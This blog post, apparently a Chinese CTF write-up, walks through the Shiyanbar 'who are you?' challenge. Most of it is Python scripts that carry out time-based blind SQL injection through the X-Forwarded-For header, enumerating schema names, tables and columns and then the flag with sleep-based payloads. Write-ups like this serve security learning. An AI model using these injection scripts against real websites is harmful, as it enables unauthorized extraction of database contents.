实验吧 who are you? By Assassin 时间盲注

时间:2022-07-08 17:16:59

说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。

首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:

Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

但是这里当然是还是用X-FORWARDED-FOR了,嗯!

用burp试验一下
实验吧   who are you?   By  Assassin  时间盲注

然后发现无论怎么搞都是原封不动的返回回来,瞬间蒙蔽…报错注入估计是指望不上了…

实验吧   who are you?   By  Assassin  时间盲注

而且发现一个有趣的现象,逗号被隔断了

实验吧   who are you?   By  Assassin  时间盲注

这种情况应该是只需要查找一项就行了吧,猜测是把字符串截断一下人后去查询吧,但是我还是不会…

么办法查一下大牛有没有什么思路吧…

原来是时间盲注!

然后想到了用暴力法去找到他得库名,表明,字段名和内容!具体就死超时判断法,用到了select case when then具体的可以上网查一下,具体实现的方法就是暴力匹配每一个字符,如何匹配了让他sleep一段时间,在get请求的时候设置一个超时去判断是否匹配成功直接看代码吧~

暴力求数据库名

# -*- coding:utf-8 -*- 
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for database_number in range(0,100): #假设爆破前100个库
databasename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying ',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
databasename+=str
flag=1
print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename
break
if flag==0:
break
database.append(databasename)
if i==1 and flag==0:
print '扫描完成'
break

for i in range(len(database)):
print database[i]

实验吧   who are you?   By  Assassin  时间盲注

这里用到了information_schema中schemata这表,嗯

暴力求表名
这里面需要提前知道,有information_sechma和web4,第一个在我的电脑上是有59列,但是也不知道他有几个…所以写个小脚本跑一下

# -*- coding:utf-8 -*- 
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,500):
print 'trying',table_number
headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print table_number
break

可以得到有42个列…有点多啊…不过呢我们一般猜测都在最后把,前面的应该都是什么information_schema里的那个。尝试一下:

# -*- coding:utf-8 -*- 
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]

for table_number in range(41,42): #假设从第60个开始
tablename=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
tablename+=str
flag=1
print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename
break
if flag==0:
break
tables.append(tablename)
if i==1 and flag==0:
print '扫描完成'
break

for i in range(len(tables)):
print tables[i]

实验吧   who are you?   By  Assassin  时间盲注
我说什么来着,就是他了。

暴力求列名
其实直接猜是不是flag啊…不过还是可以暴力,因为是上面列的最后一个嘛,所以关键字段肯定也是最后一个吧,老思路,看有几个列,然后暴力最后一个

看有几个列

# -*- coding:utf-8 -*-  
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,1000):
print 'trying',table_number
headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
print table_number
break

有483列

# -*- coding:utf-8 -*- 
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]

for column_number in range(482,483): #假设从第60个开始
cloumnname=''
for i in range(1,100): #爆破字符串长度,假设不超过100长度
flag=0
for str in guess: #爆破该位置的字符
#print 'trying',str
headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except:
cloumnname+=str
flag=1
print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
break
if flag==0:
break
columns.append(cloumnname)
if i==1 and flag==0:
print '扫描完成'
break

for i in range(len(columns)):
print columns[i]

实验吧   who are you?   By  Assassin  时间盲注

然后暴力就行了!

#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,100):
havetry=0
for str in guess:
headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
try:
res=requests.get(url,headers=headers,timeout=6)
except requests.exceptions.ReadTimeout, e:
havetry=1
flag = flag + str
print "flag:", flag
break
if havetry==0:
break
print 'result:' + flag

真是好题~